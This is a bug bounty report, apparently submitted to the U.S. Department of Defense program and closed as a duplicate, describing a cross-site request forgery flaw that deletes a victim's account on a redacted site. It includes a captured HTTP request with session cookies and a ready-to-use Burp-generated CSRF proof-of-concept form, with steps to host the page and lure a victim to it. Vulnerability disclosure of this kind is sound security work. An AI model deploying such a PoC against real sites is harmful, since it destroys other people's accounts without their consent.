CSRF to delete accounts [HtUS]
Severity: High
Program: U.S. Dept Of Defense
Reported by: nightm4re
Vulnerability Details
Hello,
I have an endpoint in ██████████ that's vulnerable to CSRF, which leads to deleting a victim's account.
Steps to reproduce:
1. Navigate to ███ and create an account
2. Click on your profile
3. You will see DELETE ACCOUNT button
4. Click on it and type YES in the input
5. Make sure Burp Suite is on and click the delete account button
```http
POST /users/deleteAccount HTTP/1.1
Host: ██████
Cookie: _ga=GA1.2.984523169.1657131465; _gid=GA1.2.2029769492.1657131465; session=eyJwYXNzcG9ydCI6eyJ1c2VyIjoibmlnaHRtNHJlQHdlYXJlaGFja2Vyb25lLmNvbSJ9fQ==; session.sig=S8rkHNPfoRIIU66VUCbDCaV_Kb4; _ga_FCSTM1E00P=GS1.1.1657145372.2.1.1657145650.0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: https://███████
Referer: https://█████/users/deleteAccount
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Content-Length: 0
Te: trailers
Connection: close
```
6. Capture the request and right-click > Engagement Tools > Generate CSRF PoC
```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://████/users/deleteAccount" method="POST">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
7. Copy the HTML code, put it on your server, and send the page to the victim
8. Once the victim opens the page, their account will be deleted
## Impact
An attacker can delete a victim's account.
Report Details
State: Closed
Substate: Duplicate
Weakness: Cross-Site Request Forgery (CSRF)